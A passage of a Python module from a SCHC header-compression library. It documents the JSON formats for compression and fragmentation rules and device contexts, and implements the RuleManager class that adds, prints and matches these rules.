\"ignore\",\"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.LEN\", \"FL\": 16,\"FP\": 1, \"DI\": \"Bi\", \"MO\": \"ignore\",\"CDA\": \"compute-length\"},\n {\"FID\": \"IPV6.NXT\", \"FL\": 8, \"FP\": 1, \"DI\": \"Bi\", \"TV\": 58, \"MO\": \"equal\", \"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.HOP_LMT\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 255,\"MO\": \"ignore\",\"CDA\": \"not-sent\"},\n {\"FID\": \"IPV6.DEV_PREFIX\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [\"2001:db8::/64\",\n \"fe80::/64\",\n \"2001:0420:c0dc:1002::/64\" ],\n \"MO\": \"match-mapping\",\"CDA\": \"mapping-sent\",\"SB\": 1},\n {\"FID\": \"IPV6.DEV_IID\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": \"::79\",\"MO\": \"equal\",\"CDA\": \"DEVIID\"},\n {\"FID\": \"IPV6.APP_PREFIX\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [ \"2001:db8:1::/64\",\n \"fe80::/64\",\n \"2404:6800:4004:818::/64\" ],\n \"MO\": \"match-mapping\",\"CDA\": \"mapping-sent\", \"SB\": 2},\n {\"FID\": \"IPV6.APP_IID\",\"FL\": 64,\"FP\": 1,\"DI\": \"Bi\",\"TV\": \"::2004\",\"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.TYPE\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 128,\"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.CODE\",\"FL\": 8,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 0, \"MO\": \"equal\",\"CDA\": \"not-sent\"},\n {\"FID\": \"ICMPV6.CKSUM\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": 0,\"MO\": \"ignore\",\"CDA\": \"compute-checksum\"},\n {\"FID\": \"ICMPV6.IDENT\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [],\"MO\": \"ignore\",\"CDA\": \"value-sent\"},\n {\"FID\": \"ICMPV6.SEQNB\",\"FL\": 16,\"FP\": 1,\"DI\": \"Bi\",\"TV\": [],\"MO\": \"ignore\",\"CDA\": \"value-sent\"}\n ]\n }\n\n\nFragmentation Rules\n-------------------\n\nFragmentation rules define how the compression and decompression must be performed.\n\nThe keyword **Fragmentation** is followed by a dictionnary containing the different parameters used.\nInside the keyword **FRMode** indicates which Fragmentation mode is used (**NoAck**, **AckAlways**, **AckOnError**).\n**FRDirection** give the direction of the fragmentation rule. **UP** means that data fragments are sent by the device,\n**DW** for the opposite direction. This entry is mandatory.\nThen the keyword **FRModeProfiler** gives the information needed to create the SCHC fragmentation header and mode profile:\n\n* **dtagSize** gives in bit the size of the dtag field. <>. This keyword can be used by all the fragmentation modes.\n* **WSize** gives in bit the size of Window field. If not present, the default value is 0 (no window) in \\\nNoAck and 1 in AckAlways. In ackOnErr this field must be set to 1 or to an higher value.\n* **FCNSize** gives in bit the size of the FCN field. If not present, by default, the value is 1 for NoAck.\\\nFor AckAlways and AckOnError the value must be specified.\n* **ackBehavior** this keyword specifies on AckOnError, when the fragmenter except to receive a bitmap from the reassembler:\n\n * *afterAll1*: the bitmap (or RCS OK) is expected only after the reception of a All-1.\n * *afterAll0*: the bitmap may be expected after the transmission of the window last fragment (All-0 or All-1)\n\n* **lastTileInAll1**: true to append last tile to the All-1 message, false otherwise.\n* **tileSize** gives the size in bit of a tile.\n* **MICAlgorithm** gives the algorithm used to compute the MIB, by default **RCS_RFC8724** (e.g. crc32),\n* **MICWordSize** gives the size of the RCS word.\n* **maxRetry** indicates to the sender how many time a fragment or ack request can be sent.\n* **timeout** indicated in seconds to the sender how many time between two retransmissions. The receiver can compute the delay before aborting.\n\nFor instance::\n\n {\n \"RuleID\": 1,\n \"RuleLength\": 3,\n \"Fragmentation\" : {\n \"FRMode\": \"AckOnError\",\n \"FRDirection\": \"UP\",\n \"FRModeProfile\": {\n \"dtagSize\": 2,\n \"WSize\": 5,\n \"FCNSize\": 3,\n \"ackBehavior\": \"afterAll1\",\n \"tileSize\": 9,\n \"MICAlgorithm\": \"RCS_RFC8724\",\n \"MICWordSize\": 8,\n \"maxRetry\": 4,\n \"timeout\": 600,\n \"lastTileInAll1\": false\n }\n }\n }\n\n-------\nContext\n-------\n\nA context is associated with a specific device, which may be identified by a unique LPWAN\nidentifier, for instance a LoRaWAN devEUI.\n\nThe context also includes a set of rules. The rule description is defined [above](#rule-definition)::\n\n\n [\n {\n \"DeviceID\": 0x1234567890,\n \"SoR\" : [ ..... ]\n },\n {\n \"DeviceID\": 0xDEADBEEF,\n \"SoR\" : [ ..... ]\n },\n ...\n ]\n\nDeviceID is a numerical value that must be unique in the context. If the context is used on a device, the deviceID may be omitted or set to null. In the core network, the DeviceIDs must be specified.\n\nThe set of rules itself expands as shown below::\n\n [\n {\n \"RuleID\" : 12,\n \"RuleIDLength\" : 4,\n \"compression\": [\n {\n \"FID\": \"IPV6.VER\",\n \"FL\": 4,\n \"FP\": 1,\n \"DI\": \"Bi\",\n \"TV\": 6,\n \"MO\": \"equal\",\n \"CDA\": \"not-sent\"\n },\n {\n \"FID\": \"IPV6.DEV_PREFIX\",\n \"FL\": 64,\n \"FP\": 1,\n \"DI\": \"Bi\",\n \"TV\": [ \"2001:db8::/64\", \"fe80::/64\", \"2001:0420:c0dc:1002::/64\" ],\n \"MO\": \"match-mapping\",\n \"CDA\": \"mapping-sent\",\n },\n ]\n },\n {\n \"RuleID\" : 13,\n \"RuleIDLength\" : 4,\n \"fragmentation\" : ....\n },\n .....\n ]\n\n\n\nRemove\n------\n\nSuppresses a rule for a specific device <<< only one, or a set of rules? >>>. If no rule is specified, all rules for that device are removed from the context::\n\n RM.remove ({\"DeviceID\": 0x1234567, \"SoR\": {{\"ruleID\":12, \"ruleLength\":4}}})\n RM.remove ({\"DeviceID\": 0x1234567})\n\nFindRuleFromPacket\n------------------\n\nThis method returns a rule and a DeviceID that match a packet description given by the protocol analyzer.\n\nFindFragmentationRule (size)\n----------------------------\n\nReturns a fragmentation rule compatible with the packet size passed as parameter.\n\n\nFindRuleFromID\n--------------\n\nGiven the first bits received from the LPWAN, returns either a fragmentation or a compression rule.\n\n\n\"\"\"\n\nfrom operator import mod\nfrom gen_base_import import *\nfrom copy import deepcopy\nfrom gen_parameters import *\nfrom compr_core import *\nfrom compr_parser import *\nimport ipaddress\nimport warnings\n\nimport base64\nimport cbor2 as cbor\n\n\"\"\"\n.. module:: gen_rulemanager\n :platform: Python, Micropython\n :synopsis: This module is used to manage rules.\n\"\"\"\n\n# XXX to be checked whether they are needed.\nDEFAULT_FRAGMENT_RID = 1\nDEFAULT_L2_SIZE = 8\nDEFAULT_RECV_BUFSIZE = 512\nDEFAULT_TIMER_T1 = 5\nDEFAULT_TIMER_T2 = 10\nDEFAULT_TIMER_T3 = 10\nDEFAULT_TIMER_T4 = 12\nDEFAULT_TIMER_T5 = 14\n\n# CONTAINS DEFAULT AND USEFUL INFORMATION ON FIELDS\n\nclass IPv6address:\n addr = b''\n\nFIELD__DEFAULT_PROPERTY = {\n T_IPV6_VER : {\"FL\": 4, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_TC : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_FL : {\"FL\": 20, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_NXT : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_HOP_LMT : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_LEN : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_IPV6_DEV_PREFIX : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_DEV_IID : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_APP_PREFIX : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_IPV6_APP_IID : {\"FL\": 64, \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_UDP_DEV_PORT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_APP_PORT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_LEN : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_UDP_CKSUM : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_TYPE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_CODE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_CKSUM : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_IDENT : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_SEQNO : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_UNUSED : {\"FL\": 32, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_ICMPV6_PAYLOAD : {\"FL\": \"var\", \"TYPE\": bytes, \"ALGO\": \"DIRECT\" },\n T_COAP_VERSION : {\"FL\": 2, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TYPE : {\"FL\": 2, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TKL : {\"FL\": 4, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_CODE : {\"FL\": 8, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_MID : {\"FL\": 16, \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_TOKEN : {\"FL\": \"tkl\", \"TYPE\": int, \"ALGO\": \"DIRECT\" },\n T_COAP_OPT_URI_PATH : {\"FL\": \"var\", \"TYPE\": str, \"ALGO\": \"COAP_OPTION\" },\n T_COAP_OPT_CONT_FORMAT : {\"FL\": \"var\", \"TYPE\": int, \"ALGO\": \"COAP_OPTION\"},\n T_COAP_OPT_URI_QUERY : {\"FL\": \"var\", \"TYPE\": str, \"ALGO\": \"COAP_OPTION\" },\n T_COAP_OPT_NO_RESP : {\"FL\": \"var\", \"TYPE\": int, \"ALGO\": \"COAP_OPTION\"}\n}\n\n\n\nclass RuleManager:\n \"\"\"\n # Class RuleManager\n\n A RuleManager object is created this way:\n\n from RuleManager import *\n\n RM = RuleManager()\n\n arguments:\n\n - file: the RuleManager takes a file to upload rule_set\n - log: display debugging events\n\n \"\"\"\n\n def _return_default(self, elm, idx, val):\n \"\"\"test if a value is in the dictionary, otherwise return a specific value \"\"\"\n if idx in elm:\n return elm[idx]\n else:\n return val\n\n def Add(self, device=None, dev_info=None, file=None, compression=True):\n \"\"\"\n Add is used to add a new rule or a set of rules to a context. Add checks the validity of the rule:\n\n * ruleID/RuleIDLength do not overlap\n * the rule contains either one of a fragmentation and a compression description.\n\n If the DeviceID already exists in the context, the new rule is added to that context, providing no conflict on the RuleID is found.\n\n RM.Add ({\"DeviceID\": 0x1234567, \"sor\": {.....}})\n\n \"\"\"\n\n assert (dev_info is not None or file is not None)\n\n if file != None:\n dev_info = json.loads(open(file).read())\n\n if type(dev_info) is dict: #Context or Rules\n if T_RULEID in dev_info: # Rules\n sor = [dev_info]\n elif \"SoR\" in dev_info:\n if \"DeviceID\" in dev_info:\n device = dev_info[\"DeviceID\"]\n sor = dev_info[\"SoR\"]\n else:\n raise ValueError(\"unknown format\")\n elif type(dev_info) is list: # a Set of Rule\n sor = dev_info\n else:\n raise ValueError(\"unknown structure\")\n\n # check nature of the info: if \"SoR\" => device context, if \"RuleID\" => rule\n\n d = None\n for d in self._ctxt:\n if device == d[\"DeviceID\"]:\n break\n else:\n d = {\"DeviceID\": device, \"SoR\": []}\n self._ctxt.append(d)\n\n d[T_META] = {T_LAST_USED: None}\n print (\"@@@@@\", d)\n\n for n_rule in sor:\n if T_RULEID in n_rule:\n n_ruleID = n_rule[T_RULEID]\n elif T_RULEIDVALUE in n_rule:\n n_ruleID = n_rule[T_RULEIDVALUE]\n else:\n raise ValueError(\"Rule ID Value is missing\")\n n_ruleLength = n_rule[T_RULEIDLENGTH]\n left_aligned_n_ruleID = n_ruleID << (32 - n_ruleLength)\n\n overlap = False\n for e_rule in d[\"SoR\"]: # check no overlaps on RuleID\n left_aligned_e_ruleID = e_rule[T_RULEID] << (32 - e_rule[T_RULEIDLENGTH])\n if left_aligned_e_ruleID == left_aligned_n_ruleID:\n dprint (\"Warning; Rule {}/{} exists not inserted\".format(bin(n_ruleID), n_ruleLength) )\n overlap = True\n break\n\n if not overlap:\n if T_COMP in n_rule:\n r = self._create_compression_rule(n_rule, device)\n d[\"SoR\"].append(r)\n elif T_FRAG in n_rule:\n r = self._create_fragmentation_rule(n_rule)\n d[\"SoR\"].append(r)\n elif T_NO_COMP in n_rule:\n already_exists = self.FindNoCompressionRule(deviceID=device)\n if already_exists == None:\n arule = {}\n arule[T_RULEID] = n_ruleID\n arule[T_RULEIDLENGTH] = n_rule[T_RULEIDLENGTH]\n arule[T_NO_COMP] = []\n d[\"SoR\"].append(arule)\n else:\n print (\"Warning 'no compression' rule already exists\")\n else:\n raise ValueError (\"Rule type undefined\")\n #print (n_rule)\n\n def _create_fragmentation_rule (self, nrule):\n arule = {}\n if T_RULEID in nrule:\n arule[T_RULEID] = nrule[T_RULEID]\n elif T_RULEIDVALUE in nrule:\n arule[T_RULEID] = nrule[T_RULEIDVALUE]\n else:\n raise ValueError(\"Rule ID missing.\")\n arule[T_RULEIDLENGTH] = nrule[T_RULEIDLENGTH]\n arule[T_FRAG] = {}\n\n def _default_value (ar, nr, idx, default=None, failed=False):\n if failed and not idx in nr[T_FRAG][T_FRAG_PROF]:\n raise ValueError (\"{} not found\".format(idx))\n\n if not T_FRAG_PROF in nr[T_FRAG] or not idx in nr[T_FRAG][T_FRAG_PROF]:\n ar[T_FRAG][T_FRAG_PROF][idx] = default\n else:\n ar[T_FRAG][T_FRAG_PROF][idx] = nr[T_FRAG][T_FRAG_PROF][idx]\n\n if not T_FRAG_DIRECTION in nrule[T_FRAG]:\n raise ValueError (\"Keyword {} must be specified with {} or {}\".format(T_FRAG_DIRECTION, T_DIR_UP, T_DIR_DW))\n\n if not nrule[T_FRAG][T_FRAG_DIRECTION] in [T_DIR_UP, T_DIR_DW]:\n raise ValueError (\"Keyword {} must be {} or {}\".format(T_FRAG_DIRECTION, T_DIR_UP, T_DIR_DW))\n\n arule[T_FRAG][T_FRAG_DIRECTION] = nrule[T_FRAG][T_FRAG_DIRECTION] \n\n\n if T_FRAG_MODE in nrule[T_FRAG]:\n if not T_FRAG_PROF in nrule[T_FRAG]:\n arule[T_FRAG][T_FRAG_MODE] = {}\n\n if nrule[T_FRAG][T_FRAG_MODE] in [T_FRAG_NO_ACK, T_FRAG_ACK_ALWAYS, T_FRAG_ACK_ON_ERROR]:\n arule[T_FRAG][T_FRAG_MODE] = nrule[T_FRAG][T_FRAG_MODE]\n arule[T_FRAG][T_FRAG_PROF] ={}\n\n _default_value (arule, nrule, T_FRAG_FCN)\n _default_value (arule, nrule, T_FRAG_DTAG_SIZE, 0)\n _default_value (arule, nrule, T_FRAG_MIC, T_FRAG_RFC8724)\n\n if nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_NO_ACK:\n _default_value(arule, nrule, T_FRAG_DTAG_SIZE, 2)\n _default_value (arule, nrule, T_FRAG_W_SIZE, 0)\n _default_value (arule, nrule, T_FRAG_FCN, 3)\n _default_value(arule, nrule, T_FRAG_L2WORDSIZE, 8)\n elif nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ALWAYS:\n _default_value (arule, nrule, T_FRAG_W_SIZE, 1)\n _default_value(arule, nrule, T_FRAG_L2WORDSIZE, 8)\n _default_value (arule, nrule, T_FRAG_MAX_RETRY, 4)\n _default_value (arule, nrule, T_FRAG_TIMEOUT, 600)\n elif nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ON_ERROR:\n if not T_FRAG_FCN in nrule[T_FRAG][T_FRAG_PROF]:\n raise ValueError (\"FCN Must be specified for Ack On Error\")\n\n _default_value (arule, nrule, T_FRAG_W_SIZE, 1)\n _default_value (arule, nrule, T_FRAG_ACK_BEHAVIOR, T_FRAG_AFTER_ALL1)\n _default_value (arule, nrule, T_FRAG_TILE, None, True)\n _default_value (arule, nrule, T_FRAG_MAX_RETRY, 4)\n _default_value (arule, nrule, T_FRAG_TIMEOUT, 600)\n _default_value (arule, nrule, T_FRAG_L2WORDSIZE, 8)\n _default_value (arule, nrule, T_FRAG_LAST_TILE_IN_ALL1, None, True)\n\n if nrule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] == True:\n raise NotImplementedError (\"Last tile in All-1 is not implemented yet\")\n\n # the size include All-*, Max_VLAUE is WINDOW_SIZE-1\n _default_value(arule, nrule, T_FRAG_WINDOW_SIZE, (0x01 <<(arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN]))-1)\n else:\n raise ValueError (\"Unknown fragmentation mode\", nrule[T_FRAG][T_FRAG_MODE])\n else:\n raise ValueError(\"No fragmentation mode\")\n\n return arule\n\n def get_values(self, values):\n \"\"\"This function transforms the YANG list indexed with the first element, to a Python list.\n The key do not have to be sorted, unlisted positions are filled with None. Element stays as\n byte array. \n \"\"\"\n value_list = []\n for e in values: \n list_len = len(value_list)\n for i in range(list_len, e[1]+1): # fill with None to the position\n value_list.append(None)\n\n value_list[e[1]] = e[2]\n\n return value_list\n\n def _create_compression_rule (self, nrule, device_id = None):\n \"\"\"\n parse a rule to verify values and fill defaults\n \"\"\"\n arule = {}\n if T_RULEID in nrule: # transition for RuleID to RuleIDValue\n arule[T_RULEID] = nrule[T_RULEID]\n elif T_RULEIDVALUE in nrule:\n arule[T_RULEID] = nrule[T_RULEIDVALUE]\n else:\n raise ValueError(\"RuleID Value is missing\")\n arule[T_RULEIDLENGTH] = nrule[T_RULEIDLENGTH]\n\n if T_ACTION in nrule:\n print (\"Warning: using experimental Action\")\n arule[T_ACTION] = nrule[T_ACTION]\n\n\n\n arule[T_COMP] = []\n\n up_rules = 0\n dw_rules = 0\n\n for r in nrule[T_COMP]:\n if r[\"FID\"] == T_COAP_OPT_END:\n # XXX: check ignoring is the proper behavior, or what should be done the T_COAP_OPT_END\n # which is still generated by the parser but was not handled by this code.\n warnings.warn(\"Note: T_COAP_OPT_END is ignored\")\n continue\n if not r[\"FID\"] in FIELD__DEFAULT_PROPERTY:\n raise ValueError( \"Unkwown field id {} in rule {}/{}\".format(\n r[\"FID\"], arule[T_RULEID], arule[T_RULEIDLENGTH]\n ))\n\n entry = {}\n FID = r[T_FID]\n entry[T_FID] = FID\n entry[T_FL] = self._return_default(r, T_FL, FIELD__DEFAULT_PROPERTY[FID][T_FL])\n entry[T_FP] = self._return_default(r, T_FP, 1)\n entry[T_DI] = self._return_default(r, T_DI, T_DIR_BI)\n if entry[T_DI] in [T_DIR_BI, T_DIR_UP]: up_rules += 1\n if entry[T_DI] in [T_DIR_BI, T_DIR_DW]: dw_rules += 1\n\n MO = r[T_MO].upper()\n if MO in [T_MO_EQUAL, T_MO_MSB, T_MO_IGNORE, T_MO_MATCH_REV_RULE]:\n if MO == T_MO_MSB:\n if T_MO_VAL in r:\n entry[T_MO_VAL] = r[T_MO_VAL]\n else:\n raise ValueError (\"MO Value missing for {}\".format(FID))\n\n if T_TV in r:\n if type(r[T_TV]) is dict:\n if len(r[T_TV]) != 1:\n raise ValueError(FID+\": Only one command for TV.\")\n\n if not list(r[T_TV])[0] in [T_CMD_INDIRECT]:\n raise ValueError(FID+\": Unknown TV command.\")\n\n dic = r[T_TV] # set value to bytearray\n key = next(iter(dic))\n val = list(dic.values())[0]\n\n\n print (\"---------> \", key, val)\n entry[T_TV_IND] = adapt_value(key,entry[T_FL], FID)\n else:\n entry[T_TV] = adapt_value(r[T_TV], entry[T_FL], FID)\n else:\n entry[T_TV] = None\n\n elif MO == T_MO_MMAP:\n entry[T_TV] = []\n for e in r[T_TV]:\n entry[T_TV].append(adapt_value(e, entry[T_FL], FID))\n\n else:\n raise ValueError(\"{} MO unknown\".format(MO))\n entry[T_MO] = MO\n\n CDA = r[T_CDA].upper()\n if not CDA in [T_CDA_NOT_SENT, T_CDA_VAL_SENT, T_CDA_MAP_SENT, T_CDA_LSB, T_CDA_COMP_LEN, \n T_CDA_COMP_CKSUM, T_CDA_DEVIID, T_CDA_APPIID, T_CDA_REV_COMPRESS]:\n raise ValueError(\"{} CDA not found\".format(CDA))\n entry[T_CDA] = CDA\n\n arule[T_COMP].append(entry)\n\n if not T_META in arule:\n arule[T_META] = {}\n arule[T_META][T_UP_RULES] = up_rules\n arule[T_META][T_DW_RULES] = dw_rules\n arule[T_META][T_DEVICEID] = device_id\n arule[T_META][T_LAST_USED] = None\n\n return arule\n\n\n def __init__(self, file=None, log=None):\n #RM database\n self._ctxt = []\n self._log = log\n self._db = []\n self._sid_info = []\n self.sid_key_mapping = {}\n\n def _smart_print(self, v):\n if type(v) is str:\n v = '\"'+v+'\"'\n print ('{:<30}'.format(v), end=\"\")\n elif type(v) is int:\n print ('{:>30}'.format(v), end=\"\")\n elif type(v) is bytes:\n print ('{:>30}'.format(v.hex()), end=\"\")\n\n def printBin(self, v, l):\n txt = \"\"\n for i in range (7, -1, -1):\n if i >= l: txt += \" \"\n elif v & (0x01 << i) == 0: txt += \"0\"\n else: txt += \"1\"\n return txt\n\n def Print (self):\n \"\"\"\n Print a context\n \"\"\"\n for dev in self._ctxt:\n print (\"*\"*40)\n print (\"Device:\", dev[\"DeviceID\"])\n\n for rule in dev[\"SoR\"]:\n print (\"/\" + \"-\"*25 + \"\\\\\")\n txt = str(rule[T_RULEID])+\"/\"+ str(rule[T_RULEIDLENGTH])\n print (\"|Rule {:8} {:10}|\".format(txt, self.printBin(rule[T_RULEID], rule[T_RULEIDLENGTH])))\n\n if T_COMP in rule:\n print (\"|\" + \"-\"*15 + \"+\" + \"-\"*3 + \"+\" + \"-\"*2 + \"+\" + \"-\"*2 + \"+\" + \"-\"*30 + \"+\" + \"-\"*13 + \"+\" + \"-\"*16 +\"\\\\\")\n for e in rule[T_COMP]:\n msg2 = None\n if len(e[T_FID]) < 16:\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|\".format(e[T_FID], e[T_FL], e[T_FP], e[T_DI]), end='')\n else:\n msg = e[T_FID]\n if \"-\" in msg:\n msg1, msg2 = msg.split('-')\n msg1 += '-'\n else:\n msg1 = msg[:15]\n msg2 = msg[15:]\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|\".format(msg1, e[T_FL], e[T_FP], e[T_DI]), end=\"\")\n\n if 'TV' in e:\n if type(e[T_TV]) is list:\n self._smart_print(e[T_TV][0])\n elif type(e[T_TV]) is dict:\n self._smart_print(list(e[T_TV])[0]+'('+list(e[T_TV].values())[0]+')' )\n else:\n self._smart_print(e[T_TV])\n if not T_TV in e or e[T_TV] == None:\n print (\"-\"*30, end=\"\")\n\n txt = e[T_MO]\n if T_MO_VAL in e:\n txt = txt+ '(' + str(e[T_MO_VAL])+')'\n\n print (\"|{:13}|{:16}|\".format(txt, e[T_CDA]))\n\n if (T_TV in e) and (type (e[T_TV]) is list):\n for i in range (1, len(e[T_TV])):\n print (\":{:^15s}:{:^3}:{:^2}:{:^2}:\".format(\".\", \".\", \".\",\".\"), end='')\n self._smart_print(e[T_TV][i])\n print (\":{:^13}:{:^16}:\".format(\".\", \".\"))\n\n if msg2 != None: # FID is too large, wrote it on 2 lignes, this is the second line\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|{:30}|{:13}|{:16}|\".format(msg2, \"\", \"\", \"\", \"\", \"\", \"\" ), )\n\n print (\"\\\\\" + \"-\"*15 + \"+\" + \"-\"*3 + \"+\" + \"-\"*2 + \"+\" + \"-\"*2 + \"+\" + \"-\"*30 + \"+\" + \"-\"*13 + \"+\" + \"-\"*16 +\"/\")\n elif T_FRAG in rule:\n # print (rule)\n if rule[T_FRAG][T_FRAG_DIRECTION] == T_DIR_UP:\n dir_c = \"^\"\n else:\n dir_c = \"v\"\n\n print (\"!\" + \"=\"*25 + \"+\" + \"=\"*61 +\"\\\\\")\n print (\"!{} Fragmentation mode : {:<15} header dtag{:2} Window {:2} FCN {:2} {:13}{:2} {}!\"\n .format(\n dir_c,\n rule[T_FRAG][T_FRAG_MODE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN],\n \"\",\n rule[T_FRAG][T_FRAG_DIRECTION],\n dir_c\n ))\n\n if T_FRAG_TILE in rule[T_FRAG][T_FRAG_PROF]:\n txt = \"Tile size: \"+ str(rule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE])\n else:\n txt = \"No Tile size specified\"\n print (\"!{} {:<84}{}!\".format(dir_c, txt, dir_c))\n\n\n print (\"!{} RCS Algorithm: {:<69}{}!\".format(dir_c,rule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC], dir_c))\n\n if rule[T_FRAG][T_FRAG_MODE] != T_FRAG_NO_ACK:\n print (\"!{0}\" + \"-\"*83 +\"{0}!\".format(dir_c))\n if rule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ON_ERROR:\n txt = \"Ack behavior: \"+ rule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR]\n print (\"!{} {:<84}{}!\".format(dir_c, txt, dir_c))\n\n print (\"!{} Max Retry : {:4} Timeout {:5} seconds {:42} {}!\".format(\n dir_c,\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_TIMEOUT], \"\",\n dir_c\n ))\n\n print (\"\\\\\" + \"=\"*87 +\"/\")\n elif T_NO_COMP in rule:\n print (\"+\"+ \"~\"*25 + \"+\")\n print (\"| NO COMPRESSION |\")\n print (\"\\\\\"+ \"~\"*25 + \"/\")\n\n if T_INDEXES in dev and len(dev[T_INDEXES]) > 0:\n print (\"INDEXES:\")\n for x, y in dev[T_INDEXES].items():\n print (x,\"-->\", y)\n\n\n# Find rules \n\n def MO_IGNORE (self, TV, FV, rlength, flength, arg, direction=None):\n return True\n\n def MO_EQUAL (self, TV, FV, rlength, flength, arg, direction=None):\n if type(TV) != type(FV):\n return False\n\n if TV != FV: return False\n return True\n\n def MO_MSB (self, TV, FV, rlength, flength, arg, direction=None):\n print (\"MSB\")\n print (TV, FV, rlength, flength, arg)\n\n if rlength == T_FUNCTION_VAR:\n rlength = flength\n\n ignore_bit = rlength - arg\n\n for b in range(arg):\n pos = b%8\n byte_pos = b//8\n\n right_byte_tv = TV[byte_pos]\n right_byte_fv = FV[byte_pos]\n\n bit_tv = right_byte_tv & (1 << (7 -pos))\n bit_fv = right_byte_fv & (1 << (7 -pos))\n\n print (b, pos, ignore_bit,'|', TV, FV, '|', right_byte_tv, right_byte_fv, '-',bit_tv, bit_fv)\n\n if bit_tv != bit_fv:\n print (\"comparison failed\")\n return False\n \n print (\"comparison succeeded\")\n return True\n\n\n def MO_MMAP (self, TV, FV, rlength, flength, arg, direction=None):\n for v in TV:\n if self.MO_EQUAL (v, FV, rlength, flength, arg): return True\n return False\n \n def MO_MATCH_REV_RULE (self, TV, FV, rlength, flength, arg, direction=None):\n\n if direction == T_DIR_UP:\n direction = T_DIR_DW\n elif direction == T_DIR_DW:\n direction = T_DIR_UP\n\n P = Parser(None)\n\n header_d, payload, error = P.parse(FV, direction=direction)\n rule = self.FindRuleFromPacket(header_d, direction=direction)\n\n if rule == None:\n return False\n \n return True \n\n MO_function = {\n T_MO_IGNORE : MO_IGNORE,\n T_MO_EQUAL : MO_EQUAL,\n T_MO_MSB : MO_MSB,\n T_MO_MMAP : MO_MMAP,\n T_MO_MATCH_REV_RULE: MO_MATCH_REV_RULE,\n }\n\n def FindRuleFromSCHCpacket (self, schc, device=None):\n \"\"\" returns the rule corresponding to the id stored at the\n beginning of the SCHC packet.\n \"\"\"\n\n for d in self._ctxt:\n dprint (d[\"DeviceID\"])\n if d[\"DeviceID\"] == device: #look for a specific device\n for r in d[\"SoR\"]:\n ruleID = r[T_RULEID]\n ruleLength = r[T_RULEIDLENGTH]\n\n tested_rule = schc.get_bits(ruleLength, position=0)\n\n dprint (tested_rule, ruleID)\n if tested_rule == ruleID:\n return r\n\n return None\n\n\n def FindRuleFromPacket(self, pkt, direction=T_DIR_BI, failed_field=False):\n \"\"\" Takes a parsed packet and returns the matching rule.\n \"\"\"\n for dev in self._ctxt:\n for rule in dev[\"SoR\"]:\n if \"Compression\" in rule:\n matches = 0\n for r in rule[\"Compression\"]:\n print(r)\n #print (pkt[(r[T_FID], r[T_FP])][0])\n if r[T_DI] == T_DIR_BI or r[T_DI] == direction:\n if (r[T_FID], r[T_FP]) in pkt:\n if T_MO_VAL in r:\n arg = r[T_MO_VAL]\n else:\n arg = None\n\n if self.MO_function[r[T_MO]](self,\n r[T_TV], pkt[(r[T_FID], r[T_FP])][0],\n r[T_FL], pkt[(r[T_FID], 